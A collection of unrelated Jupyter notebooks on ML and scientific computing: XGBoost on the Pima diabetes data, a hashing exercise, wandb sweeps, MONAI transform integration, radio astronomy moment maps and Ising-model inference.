- Split data into training & test parts (utilize the training part for training & hyperparameter tuning of model, and test part for the final evaluation of model)
# Model Training:
- Build an initial XGBoost model, and evaluate it via C-V approach
- Use grid-search along with C-V approach to find the best hyperparameters of XGBoost model: Find the best XGBoost model (Note: I've utilized SMOTE technique via imblearn toolbox to synthetically over-sample the minority category and even the dataset imbalances.)
# Model Evaluation:
- Evaluate the best XGBoost model with optimized hyperparameters on Test Dataset, by calculating:
- AUC score
- Confusion matrix
- ROC curve
- Precision-Recall curve
- Average precision
Finally, calculate the Feature Importance.
```
import sklearn
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import preprocessing
%matplotlib inline
from scipy import stats
import warnings
warnings.filterwarnings("ignore")
# Function to remove outliers (all rows) by Z-score:
def remove_outliers(X, y, name, thresh=3):
L=[]
for name in name:
drop_rows = X.index[(np.abs(X[name] - X[name].mean()) >= (thresh * X[name].std()))]
L.extend(list(drop_rows))
X.drop(np.array(list(set(L))), axis=0, inplace=True)
y.drop(np.array(list(set(L))), axis=0, inplace=True)
print('number of outliers removed : ' , len(L))
df=pd.read_csv('C:/Users/rhash/Documents/Datasets/pima-indian-diabetes/indians-diabetes.csv')
df.columns=['NP', 'GC', 'BP', 'ST', 'I', 'BMI', 'PF', 'Age', 'Class']
# To Shuffle the data:
np.random.seed(42)
df=df.reindex(np.random.permutation(df.index))
df.reset_index(inplace=True, drop=True)
df.info()
df['ST'].replace(0, df[df['ST']!=0]['ST'].mean(), inplace=True)
df['GC'].replace(0, df[df['GC']!=0]['GC'].mean(), inplace=True)
df['BP'].replace(0, df[df['BP']!=0]['BP'].mean(), inplace=True)
df['BMI'].replace(0, df[df['BMI']!=0]['BMI'].mean(), inplace=True)
df['I'].replace(0, df[df['I']!=0]['I'].mean(), inplace=True)
df.head()
X=df.drop('Class', axis=1)
y=df['Class']
# We initially devide data into training & test folds: We do the Grid-Search only on training part
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42, stratify=y)
#remove_outliers(X_train, y_train, ['NP', 'GC', 'BP', 'ST', 'I', 'BMI', 'PF', 'Age'], thresh=5)
# Building the Initial Model & Cross-Validation:
import xgboost
from xgboost import XGBClassifier
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import StratifiedKFold
model=XGBClassifier()
kfold=StratifiedKFold(n_splits=4, shuffle=True, random_state=42)
scores=cross_val_score(model, X_train, y_train, cv=kfold)
print(scores, "\n")
print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std()))
# Grid-Search for the best model parameters:
# We create a sample_weight list for this imbalanced dataset:
from sklearn.utils.class_weight import compute_sample_weight
sw=compute_sample_weight(class_weight='balanced', y=y_train)
from sklearn.model_selection import GridSearchCV
param={'max_depth':[2, 4, 6, 8], 'min_child_weight':[1, 2, 3], 'gamma': [ 0, 0.05, 0.1], 'subsample':[0.7, 1]}
kfold=StratifiedKFold(n_splits=3, shuffle=True, random_state=42)
grid_search=GridSearchCV(XGBClassifier(), param, cv=kfold, n_jobs=-1, scoring="roc_auc")
grid_search.fit(X_train, y_train, sample_weight=sw)
# Grid-Search report:
G=pd.DataFrame(grid_search.cv_results_).sort_values("rank_test_score")
G.head(3)
print("Best parameters: ", grid_search.best_params_)
print("Best validation accuracy: %0.2f (+/- %0.2f)" % (np.round(grid_search.best_score_, decimals=2), np.round(G.loc[grid_search.best_index_,"std_test_score" ], decimals=2)))
print("Test score: ", np.round(grid_search.score(X_test, y_test),2))
from sklearn.metrics import roc_curve, auc, confusion_matrix, classification_report
# Plot a confusion matrix.
# cm is the confusion matrix, names are the names of the classes.
def plot_confusion_matrix(cm, names, title='Confusion matrix', cmap=plt.cm.Blues):
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(names))
plt.xticks(tick_marks, names, rotation=45)
plt.yticks(tick_marks, names)
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
names = ["0", "1"]
# Compute confusion matrix
cm = confusion_matrix(y_test, grid_search.predict(X_test))
np.set_printoptions(precision=2)
print('Confusion matrix, without normalization')
print(cm)
# Normalize the confusion matrix by row (i.e by the number of samples in each class)
cm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print('Normalized confusion matrix')
print(cm_normalized)
plt.figure()
plot_confusion_matrix(cm_normalized, names, title='Normalized confusion matrix')
plt.show()
# Classification report:
report=classification_report(y_test, grid_search.predict(X_test))
print(report)
# ROC curve & auc:
from sklearn.metrics import precision_recall_curve, roc_curve, roc_auc_score, average_precision_score
fpr, tpr, thresholds=roc_curve(np.array(y_test),grid_search.predict_proba(X_test)[:, 1] , pos_label=1)
roc_auc=roc_auc_score(np.array(y_test), grid_search.predict_proba(X_test)[:, 1])
plt.figure()
plt.step(fpr, tpr, color='darkorange', lw=2, label='ROC curve (auc = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', alpha=0.4, lw=2, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC curve')
plt.legend(loc="lower right")
plt.plot([cm_normalized[0,1]], [cm_normalized[1,1]], 'or')
plt.show()
# Precision-Recall trade-off:
precision, recall, thresholds=precision_recall_curve(y_test,grid_search.predict_proba(X_test)[:, 1], pos_label=1)
ave_precision=average_precision_score(y_test,grid_search.predict_proba(X_test)[:, 1])
plt.step(recall, precision, color='navy')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.xlim([0, 1.001])
plt.ylim([0, 1.02])
plt.title('Precision-Recall curve: AP={0:0.2f}'.format(ave_precision))
plt.plot([cm_normalized[1,1]], [cm[1,1]/(cm[1,1]+cm[0,1])], 'ob')
plt.show()
# Feature Importance:
im=XGBClassifier().fit(X,y).feature_importances_
# Sort & Plot:
d=dict(zip(np.array(X.columns), im))
k=sorted(d,key=lambda i: d[i], reverse= True)
[print((i,d[i])) for i in k]
# Plot:
c1=pd.DataFrame(np.array(im), columns=["Importance"])
c2=pd.DataFrame(np.array(X.columns[0:8]),columns=["Feature"])
fig, ax = plt.subplots(figsize=(8,6))
sns.barplot(x="Feature", y="Importance", data=pd.concat([c2,c1], axis=1), color="blue", ax=ax)
```
|
github_jupyter
|
# Simple Hashing and Collisions
This is a very simple example of hashing based on the modulo function and neglecting the issue of collisions mentioned in the lecture.
## Introduction
Good hashing approaches are available in Python for the *Dictionary* data type. However here is a demonstration of a simple hashing function. The data values have actually been chosen to avoid collisions for the initial size for the hash table.
In this example the data values are their own keys.
## A simple hash function
```
data = [8, 17, 27, 30, 55, 56, 57, 60, 1001, 1002]
```
Some of the values are closely spaced in value. The aim is spread them through the hash table in an apparently random way.
The hash table is initially loaded with placeholder 'None' values.
The chosen size is 17 for the demo.
```
hash_table = [None] * 17
tableLength = len(hash_table)
```
The hash function is the modulo (remainder) of the data value devided by the length of the hash_table.
```
def hash_function(value, table_size):
return value % table_size
```
The data values can now be distributed in the hash_table using the hash_function.
```
for value in data:
hash_table[hash_function(value, tableLength)] = value
```
Here they are, notice the function has distributed them through the table.
```
print(hash_table)
```
A value can be retrieved from the table by applying the hash function - but in this case they are their own keys so it does not appear very useful.
```
print(hash_table[hash_function(27, tableLength)])
```
There is not much space for addtional values in this case without collisions. These occur when the hash_function for a new key is the same as an existing one.
,
One way to minimize collisions is to make a better choice for the hashing function. For example it might be better to use a large prime number for the modulo function function in preference to the tableLength value *e.g.* for a 1000-slot table use the prime 997.
A completely functional hash_table would have one of the methods for dealing with a collision. The overhead in dealing with collisions will decrease the hashing performance from its initial O(1). For retrieving data the process is slowed up by the added steps when a slot has been assigned to multiple data values.
The overhead increases as the *'load factor'* for the hash table increases. The *load factor* (often called $\alpha$) is the proportion of the slots that have values loaded into them.
So for the demo with initial valuesabove there are 9 data values in 15 slots: so that is a load value of 9/15 or 0.60.
For the simple linear addressing method of dealing with collisions the big O performance of the hashing varies as:
$O$ = 1+(1/(1-$\alpha$)<sup>2</sup>)
(ref. Sedgewick, R. (2003) Linear probing. p615, *Algorthims in Java*, Addison Wesley)
For low $\alpha$, such as occurs with small numbers of data elements in a large hashing table the O(1) performance will be not degraded by the 1-$\alpha$)<sup>2</sup>) term in this expression.
**To see the form of this expression with increasing $\alpha$ your job is to plot the function as the load factor approaches 1. You should do this with matlibplot. The next section shows you how to plot a function.**
## Plotting a function with matlibplot
This is simple example showing how we can plot the function $y$ = $x$<sup>2</sup> for $x$ in the range 0 to 4:
```
# This line configures matplotlib to show figures embedded in the notebook
# It uses the IPython inline 'magic' syntax
%matplotlib inline
# standard import
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
x = np.linspace(start=-4., stop=4.) # Return evenly spaced numbers over a specified interval.
y = x**2
plt.figure()
plt.plot(x,y)
plt.title('a quadratic function')
plt.xlabel('x axis label')
plt.ylabel('y axis label')
plt.show()
```
## Your task
Plot how the $O$ the big O performance of the hashing with the load factor $\alpha$ according to the Sedgewick formulae above.
Consider what is a good range to use for $\alpha$ in the plot and make sure you label both the plot and the axes.
Please note that you will need to have produced the plot to answer question 12 of the
<a href='https://canvas.anglia.ac.uk/courses/15139/assignments/88350'>TW1 quiz</a>
```
# your code for the plot
```
You should notice that the plot shows that linear addressing has a strikingly non-linear loss of performance as the hash table load factor increases.
However, a small load factor is also an inefficient use of memory space. So as a result, many more sophisticated methods of dealing with collision have been devised which have better performance at higher load factors.
|
github_jupyter
|
```
# Select TensorFlow 2.0 environment (works only on Colab)
%tensorflow_version 2.x
# Install wandb (ignore if already done)
!pip install wandb
# Authorize wandb
!wandb login
# Imports
from tensorflow.keras.models import *
from tensorflow.keras.layers import *
from wandb.keras import WandbCallback
import tensorflow as tf
import numpy as np
import wandb
import time
# Fix the random generator seeds for better reproducibility
tf.random.set_seed(67)
np.random.seed(67)
# Load the dataset
fashion_mnist = tf.keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
# Scale the pixel values of the images to
train_images = train_images / 255.0
test_images = test_images / 255.0
# Reshape the pixel values so that they are compatible with
# the conv layers
train_images = train_images.reshape(-1, 28, 28, 1)
test_images = test_images.reshape(-1, 28, 28, 1)
# Specify the labels of FashionMNIST dataset, it would
# be needed later 😉
labels = ["T-shirt/top","Trouser","Pullover","Dress","Coat",
"Sandal","Shirt","Sneaker","Bag","Ankle boot"]
METHOD = 'bayes' # change to 'random' or 'bayes' when necessary and rerun
def train():
# Prepare data tuples
(X_train, y_train) = train_images, train_labels
(X_test, y_test) = test_images, test_labels
# Default values for hyper-parameters we're going to sweep over
configs = {
'layers': 128,
'batch_size': 64,
'epochs': 5,
'method': METHOD
}
# Initilize a new wandb run
wandb.init(project='hyperparameter-sweeps-comparison', config=configs)
# Config is a variable that holds and saves hyperparameters and inputs
config = wandb.config
# Add the config items to wandb
if wandb.run:
wandb.config.update({k: v for k, v in configs.items() if k not in dict(wandb.config.user_items())})
# Define the model
model = Sequential([
Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)),
MaxPooling2D((2,2)),
Conv2D(64, (3, 3), activation='relu'),
MaxPooling2D((2,2)),
Conv2D(64, (3, 3), activation='relu'),
GlobalAveragePooling2D(),
Dense(config.layers, activation=tf.nn.relu),
Dense(10, activation='softmax')
])
# Compile the model
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
# Train the model
model.fit(X_train, y_train,
epochs=config.epochs,
batch_size=config.batch_size,
validation_data=(X_test, y_test),
callbacks=[WandbCallback(data_type="image",
validation_data=(X_test, y_test), labels=labels)])
# A function to specify the tuning configuration, it would also
# return us a sweep id (required for running the sweep)
def get_sweep_id(method):
sweep_config = {
'method': method,
'metric': {
'name': 'accuracy',
'goal': 'maximize'
},
'parameters': {
'layers': {
'values': [32, 64, 96, 128, 256]
},
'batch_size': {
'values': [32, 64, 96, 128]
},
'epochs': {
'values': [5, 10, 15]
}
}
}
sweep_id = wandb.sweep(sweep_config, project='hyperparameter-sweeps-comparison')
return sweep_id
# Create a sweep for *grid* search
sweep_id = get_sweep_id('grid')
# Run the sweep
wandb.agent(sweep_id, function=train)
# Create a sweep for *random* search (run METHOD cell first and then train())
sweep_id = get_sweep_id('random')
# Run the sweep
wandb.agent(sweep_id, function=train)
# Create a sweep for *Bayesian* search (run METHOD cell first and then train())
sweep_id = get_sweep_id('bayes')
# Run the sweep
wandb.agent(sweep_id, function=train)
```
|
github_jupyter
|
# Integrate 3rd party transforms into MONAI program
This tutorial shows how to integrate 3rd party transforms into MONAI program.
Mainly shows transforms from `BatchGenerator`, `TorchIO`, `Rising` and `ITK`.
```
! pip install batchgenerators==0.20.1
! pip install torchio==0.16.21
! pip install rising==0.2.0
! pip install itk==5.1.0
# Copyright 2020 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import glob
import numpy as np
import matplotlib.pyplot as plt
from monai.transforms import \
LoadNiftid, AddChanneld, ScaleIntensityRanged, CropForegroundd, \
Spacingd, Orientationd, SqueezeDimd, ToTensord, adaptor, Compose
import monai
from monai.utils import set_determinism
from batchgenerators.transforms.color_transforms import ContrastAugmentationTransform
from torchio.transforms import RescaleIntensity
from rising.random import DiscreteParameter
from rising.transforms import Mirror
from itk import median_image_filter
```
## Set MSD Spleen dataset path
The Spleen dataset can be downloaded from http://medicaldecathlon.com/.
```
data_root = '/workspace/data/medical/Task09_Spleen'
train_images = sorted(glob.glob(os.path.join(data_root, 'imagesTr', '*.nii.gz')))
train_labels = sorted(glob.glob(os.path.join(data_root, 'labelsTr', '*.nii.gz')))
data_dicts = [{'image': image_name, 'label': label_name}
for image_name, label_name in zip(train_images, train_labels)]
```
## Set deterministic training for reproducibility
```
set_determinism(seed=0)
```
## Setup MONAI transforms
```
monai_transforms = [
LoadNiftid(keys=['image', 'label']),
AddChanneld(keys=['image', 'label']),
Spacingd(keys=['image', 'label'], pixdim=(1.5, 1.5, 2.), mode=('bilinear', 'nearest')),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
CropForegroundd(keys=['image', 'label'], source_key='image')
]
```
## Setup BatchGenerator transforms
Note:
1. BatchGenerator requires the arg is `**data`, can't compose with MONAI transforms directly, need `adaptor`.
2. BatchGenerator requires data shape is [B, C, H, W, D], MONAI requires [C, H, W, D].
```
batch_generator_transforms = ContrastAugmentationTransform(data_key='image')
```
## Setup TorchIO transforms
Note:
1. TorchIO specifies several keys internally, use `adaptor` if conflicts.
2. There are few example or tutorial, hard to quickly get start.
3. The TorchIO transforms depend on many TorchIO modules(Subject, Image, ImageDataset, etc.), not easy to support MONAI dict input data.
4. It can handle PyTorch Tensor data(shape: [C, H, W, D]) directly, so used it to handle Tensor in this tutorial.
5. If input data is Tensor, it can't support dict type, need `adaptor`.
```
torchio_transforms = RescaleIntensity(out_min_max=(0., 1.), percentiles=(0.05, 99.5))
```
## Setup Rising transforms
Note:
1. Rising inherits from PyTorch `nn.Module`, expected input data type is PyTorch Tensor, so can only work after `ToTensor`.
2. Rising requires data shape is [B, C, H, W, D], MONAI requires [C, H, W, D].
3. Rising requires the arg is `**data`, need `adaptor`.
```
rising_transforms = Mirror(dims=DiscreteParameter((0, 1, 2)), keys=['image', 'label'])
```
## Setup ITK transforms
Note:
1. ITK transform function API has several args(not only `data`), need to set args in wrapper before Compose.
2. If input data is Numpy, ITK can't support dict type, need wrapper to convert the format.
3. ITK expects input shape [H, W, [D]], so handle every channel and stack the results.
```
def itk_transforms(x):
smoothed = list()
for channel in x['image']:
smoothed.append(median_image_filter(channel, radius=2))
x['image'] = np.stack(smoothed)
return x
```
## Compose all transforms
```
transform = Compose(monai_transforms + [
itk_transforms,
# add another dim as BatchGenerator and Rising expects shape [B, C, H, W, D]
AddChanneld(keys=['image', 'label']),
adaptor(batch_generator_transforms, {'image': 'image'}),
ToTensord(keys=['image', 'label']),
adaptor(rising_transforms, {'image': 'image', 'label': 'label'}),
# squeeze shape from [B, C, H, W, D] to [C, H, W, D] for TorchIO transforms
SqueezeDimd(keys=['image', 'label'], dim=0),
adaptor(torchio_transforms, 'image', {'image': 'data'})
])
```
## Check transforms in DataLoader
```
check_ds = monai.data.Dataset(data=data_dicts, transform=transform)
check_loader = monai.data.DataLoader(check_ds, batch_size=1)
check_data = monai.utils.misc.first(check_loader)
image, label = (check_data['image'][0][0], check_data['label'][0][0])
print(f"image shape: {image.shape}, label shape: {label.shape}")
# plot the slice [:, :, 80]
plt.figure('check', (12, 6))
plt.subplot(1, 2, 1)
plt.title('image')
plt.imshow(image[:, :, 80], cmap='gray')
plt.subplot(1, 2, 2)
plt.title('label')
plt.imshow(label[:, :, 80])
plt.show()
```
|
github_jupyter
|
```
import matplotlib,aplpy
from astropy.io import fits
from general_functions import *
import matplotlib.pyplot as plt
font = {'size' : 14, 'family' : 'serif', 'serif' : 'cm'}
plt.rc('font', **font)
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['lines.linewidth'] = 1
plt.rcParams['axes.linewidth'] = 1
#Set to true to save pdf versions of figures
save_figs = True
```
The files used to make the following plot are:
```
r_image_decals = 'HCG16_DECaLS_r_cutout.fits'
grz_image_decals = 'HCG16_DECaLS_cutout.jpeg'
obj_list = ['NW_clump','E_clump','S_clump']
#+'_mom0th.fits' or +'_mom1st.fits'
```
1. An $r$-band DECaLS fits image of HCG 16.
2. A combined $grz$ jpeg image from DECaLS covering exactly the same field.
These files were downloaded directly from the [DECaLS public website](http://legacysurvey.org/). The exact parameters defining the region and pixel size of these images is contained in the [pipeline.yml](pipeline.yml) file.
3. Moment 0 and 1 maps of each candidate tidal dwarf galaxy.
The moment 0 and 1 maps of the galaxies were generated in the *imaging* step of the workflow using CASA. The exact steps are included in the [imaging.py](casa/imaging.py) script. The masks used to make these moment maps were constructed manually using the [SlicerAstro](http://github.com/Punzo/SlicerAstro) software package. They were downloaded along with the raw data from the EUDAT service [B2SHARE](http://b2share.eudat.eu) at the beginnning of the workflow execution. The exact location of the data are given in the [pipeline.yml](pipeline.yml) file.
Make moment 0 contour overlays and moment 1 maps.
```
#Initialise figure using DECaLS r-band image
f = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])
#Display DECaLS grz image
f.show_rgb(grz_image_decals)
#Recentre and resize
f.recenter(32.356, -10.125, radius=1.5/60.)
#Overlay HI contours
f.show_contour(data='NW_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],
colors='lime',levels=numpy.arange(0.1,5.,0.05))
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Save
if save_figs:
plt.savefig('Fig15-NW_clump_mom0_cont.pdf')
#Clip the moment 1 map
mask_mom1(gal='NW_clump',level=0.1)
#Initialise figure for clipped map
f = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])
#Recentre and resize
f.recenter(32.356, -10.125, radius=1.5/60.)
#Set colourbar scale
f.show_colorscale(cmap='jet',vmin=3530.,vmax=3580.)
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Show and label colourbar
f.add_colorbar()
f.colorbar.set_axis_label_text('$V_\mathrm{opt}$ [km/s]')
#Add beam ellipse
f.add_beam()
f.beam.set_color('k')
f.beam.set_corner('bottom right')
#Save
if save_figs:
plt.savefig('Fig15-NW_clump_mom1.pdf')
#Initialise figure using DECaLS r-band image
f = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])
#Display DECaLS grz image
f.show_rgb(grz_image_decals)
#Recentre and resize
f.recenter(32.463, -10.181, radius=1.5/60.)
#Overlay HI contours
f.show_contour(data='E_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],
colors='lime',levels=numpy.arange(0.1,5.,0.05))
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Save
if save_figs:
plt.savefig('Fig15-E_clump_mom0_cont.pdf')
#Clip the moment 1 map
mask_mom1(gal='E_clump',level=0.1)
#Initialise figure for clipped map
f = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])
#Recentre and resize
f.recenter(32.463, -10.181, radius=1.5/60.)
#Set colourbar scale
f.show_colorscale(cmap='jet',vmin=3875.,vmax=3925.)
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Show and label colourbar
f.add_colorbar()
f.colorbar.set_axis_label_text('$V_\mathrm{opt}$ [km/s]')
#Add beam ellipse
f.add_beam()
f.beam.set_color('k')
f.beam.set_corner('bottom right')
#Save
if save_figs:
plt.savefig('Fig15-E_clump_mom1.pdf')
#Initialise figure using DECaLS r-band image
f = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])
#Display DECaLS grz image
f.show_rgb(grz_image_decals)
#Recentre and resize
f.recenter(32.475, -10.215, radius=1.5/60.)
#Overlay HI contours
f.show_contour(data='S_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],
colors='lime',levels=numpy.arange(0.1,5.,0.05))
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Save
if save_figs:
plt.savefig('Fig15-S_clump_mom0_cont.pdf')
#Clip the moment 1 map
mask_mom1(gal='S_clump',level=0.1)
#Initialise figure for clipped map
f = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])
#Recentre and resize
f.recenter(32.475, -10.215, radius=1.5/60.)
#Set colourbar scale
f.show_colorscale(cmap='jet',vmin=4050.,vmax=4100.)
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Show and label colourbar
f.add_colorbar()
f.colorbar.set_axis_label_text('$V_\mathrm{opt}$ [km/s]')
#Add beam ellipse
f.add_beam()
f.beam.set_color('k')
f.beam.set_corner('bottom right')
#Save
if save_figs:
plt.savefig('Fig15-S_clump_mom1.pdf')
```
|
github_jupyter
|
```
import matplotlib.pyplot as plt
import numpy as np
import numpy.linalg as nplin
import itertools
#from coniii import *
from sklearn.linear_model import LinearRegression
np.random.seed(0)
def operators(s):
#generate terms in the energy function
n_seq,n_var = s.shape
ops = np.zeros((n_seq,n_var+int(n_var*(n_var-1)/2.0)))
jindex = 0
for index in range(n_var):
ops[:,jindex] = s[:,index]
jindex +=1
for index in range(n_var-1):
for index1 in range(index+1,n_var):
ops[:,jindex] = s[:,index]*s[:,index1]
jindex +=1
return ops
def energy_ops(ops,w):
return np.sum(ops*w[np.newaxis,:],axis=1)
def generate_seqs(n_var,n_seq,n_sample=30,g=1.0,w_true1=0.0):
n_ops = n_var+int(n_var*(n_var-1)/2.0)
#w_true = g*(np.random.rand(ops.shape[1])-0.5)/np.sqrt(float(n_var))
if np.isscalar(w_true1):
w_true = np.random.normal(0.,g/np.sqrt(n_var),size=n_ops)
else:
w_true = w_true1
samples = np.random.choice([1.0,-1.0],size=(n_seq*n_sample,n_var),replace=True)
ops = operators(samples)
#n_ops = ops.shape[1]
sample_energy = energy_ops(ops,w_true)
p = np.exp(sample_energy)
p /= np.sum(p)
out_samples = np.random.choice(np.arange(n_seq*n_sample),size=n_seq,replace=True,p=p)
return w_true,samples[out_samples] #,p[out_samples],sample_energy[out_samples]
def hopfield_model(s):
ops = operators(s)
w = np.mean(ops,axis=0)
#print('hopfield error ',nplin.norm(w-w_true))
return w
def boltzmann_machine_exact(s,s_all,max_iter=150,alpha=5e-2,cov=False):
n_seq,n_var = s.shape
ops = operators(s)
cov_inv = np.eye(ops.shape[1])
ops_obs = np.mean(ops,axis=0)
ops_model = operators(s_all)
n_ops = ops.shape[1]
np.random.seed(13)
w = np.random.rand(n_ops)-0.5
for iterate in range(max_iter):
energies_w = energy_ops(ops_model,w)
probs_w = np.exp(energies_w)
probs_w /= np.sum(probs_w)
if iterate%10 == 0:
#print(iterate,nplin.norm(w-w_true)) #,nplin.norm(spin_cov_w-spin_cov_obs))
MSE = ((w-w_true)**2).mean()
print(iterate,MSE)
w += alpha*cov_inv.dot(ops_obs - np.sum(ops_model*probs_w[:,np.newaxis],axis=0))
print('final',iterate,MSE)
return w
def eps_machine(s,eps_scale=0.1,max_iter=151,alpha=0.1):
MSE = np.zeros(max_iter)
KL = np.zeros(max_iter)
E_av = np.zeros(max_iter)
n_seq,n_var = s.shape
ops = operators(s)
n_ops = ops.shape[1]
cov_inv = np.eye(ops.shape[1])
np.random.seed(13)
w = np.random.rand(n_ops)-0.5
w_iter = np.zeros((max_iter,n_ops))
for i in range(max_iter):
#eps_scale = np.random.rand()/np.max([1.,np.max(np.abs(w))])
energies_w = energy_ops(ops,w)
probs_w = np.exp(energies_w*(eps_scale-1))
z_data = np.sum(probs_w)
probs_w /= z_data
ops_expect_w = np.sum(probs_w[:,np.newaxis]*ops,axis=0)
#if iterate%int(max_iter/5.0)==0:
#E_exp = (probs_w*energies_w).sum()
#KL[i] = -E_exp - np.log(z_data) + np.sum(np.log(np.cosh(w*eps_scale))) + n_var*np.log(2.)
E_av[i] = energies_w.mean()
MSE[i] = ((w-w_true)**2).mean()
#print(RMSE[i])
#print(eps_scale,iterate,nplin.norm(w-w_true),RMSE,KL,E_av)
sec_order = w*eps_scale
w += alpha*cov_inv.dot((ops_expect_w - sec_order))
#print('final ',eps_scale,iterate,nplin.norm(w-w_true))
#w_iter[i,:] = w
return MSE,-E_av,w
max_iter = 100
n_var,n_seq = 40,5000
g = 1.0
n_ops = n_var+int(n_var*(n_var-1)/2.0)
w_true,seqs = generate_seqs(n_var,n_seq,g=g)
#VP modification
w_true1,seqs_test = generate_seqs(n_var,n_seq,g=g,w_true1=w_true)
#eps_list = [0.25,0.3,0.35,0.4,0.45,0.5]
#eps_list = [0.36,0.37,0.38,0.39,0.40,0.41,0.42,0.43,0.44]
eps_list = np.linspace(0.4,0.8,9)
n_eps = len(eps_list)
MSE = np.zeros((n_eps,max_iter))
KL = np.zeros((n_eps,max_iter))
E_av = np.zeros((n_eps,max_iter))
w_eps = np.zeros((n_eps,n_ops))
for i,eps in enumerate(eps_list):
print(eps)
MSE[i,:],E_av[i,:],w_eps[i,:] = eps_machine(seqs,eps_scale=eps,max_iter=max_iter)
plt.plot(eps_list,E_av[:,-1])
# optimal eps
ieps = np.argmax(E_av[:,-1])
print('optimal eps:',ieps,eps_list[ieps])
w = w_eps[ieps]
plt.plot(w_true,w,'ro')
plt.plot(w_true,w_true1,'ko',alpha=0.1)
plt.plot([-0.6,0.6],[-0.6,0.6])
# # Z_all_true
# s_all = np.asarray(list(itertools.product([1.0, -1.0], repeat=n_var)))
# ops_all = operators(s_all)
# E_all_true = energy_ops(ops_all,w_true)
# P_all_true = np.exp(E_all_true)
# Z_all_true = P_all_true.sum()
# np.log(Z_all_true)
# random configs
#n_random = 10000
#i_random = np.random.choice(s_all.shape[0],n_random)
#s_random = s_all[i_random]
#ops_random = operators(s_random)
#E_true = energy_ops(ops_random,w_true)
#P_true = np.exp(E_true)
#p0 = P_true/Z_all_true
#VP modification - look at test seqs that are representative of the actual distribution
ops_test = operators(seqs_test)
#E_true_test = energy_ops(ops_test,w_true)
#P_true_test = np.exp(E_true_test)
#p0_test = P_true_test/Z_all_true
seq_unique,i_seq,seq_count1 = np.unique(seqs,return_inverse=True,return_counts=True,axis=0)
seq_count = seq_count1[i_seq]
#VP modification
seq_unique_test,i_seq_test,seq_count1_test = np.unique(seqs_test,return_inverse=True,return_counts=True,axis=0)
seq_count_test = seq_count1_test[i_seq_test]
def partition_data(seqs,eps=0.999):
ops = operators(seqs)
energies_w = energy_ops(ops,w)
probs_w = np.exp(energies_w*(eps-1))
z_data = np.sum(probs_w)
probs_w /= z_data
x = np.log(seq_count*probs_w).reshape(-1,1)
y = eps*energies_w.reshape(-1,1)
reg = LinearRegression().fit(x,y)
score = reg.score(x,y)
b = reg.intercept_[0]
m = reg.coef_[0][0] # slope
# set slope = 1
lnZ_data = (eps*energies_w).mean() - (np.log(seq_count*probs_w)).mean()
# exact (to compare)
#probs_all = np.exp(eps*energies_all)
#Z_all = np.sum(probs_all)
#lnZ_all[i] = np.log(Z_all)
print(eps,score,m,b,lnZ_data)
return lnZ_data
#lnZ_data = partition_data(seqs,eps=0.9999)
#print(lnZ_data)
# Z_infer:
#Z_infer = np.exp(lnZ_data) ### NOTE
#E_infer = energy_ops(ops_random,w)
#P_infer = np.exp(E_infer)
#p1 = P_infer/Z_infer
#plt.plot(-np.log(p0),-np.log(p1),'ko',markersize=3)
#plt.plot([5,35],[5,35])
# Z_direct at eps = 1 : unique
ops_unique = operators(seq_unique)
#energies_w = energy_ops(ops_unique,w)
#probs_w = np.exp(energies_w)
#Z_direct = (probs_w/seq_count1).mean()
#lnZ_direct = np.log(Z_direct) + np.log(n_seq)
#print(lnZ_direct)
# VP modification
freq_count1 = seq_count1/n_seq
freq_count1_test = seq_count1_test/n_seq
ops_unique_test = operators(seq_unique_test)
for i,eps in enumerate(eps_list):
energies_w = energy_ops(ops_unique,w_eps[i,:])
energies_w_test = energy_ops(ops_unique_test,w_eps[i,:])
alpha = 1.5
lnZ_unique = -np.mean(freq_count1**alpha * (-energies_w + np.log(freq_count1)))/np.mean(freq_count1**alpha )
E_mean_f = -np.sum(energies_w*freq_count1)
probs_test = np.exp(energies_w_test-lnZ_unique)
print(eps,E_mean_f,lnZ_unique,-lnZ_unique - E_mean_f,np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test))
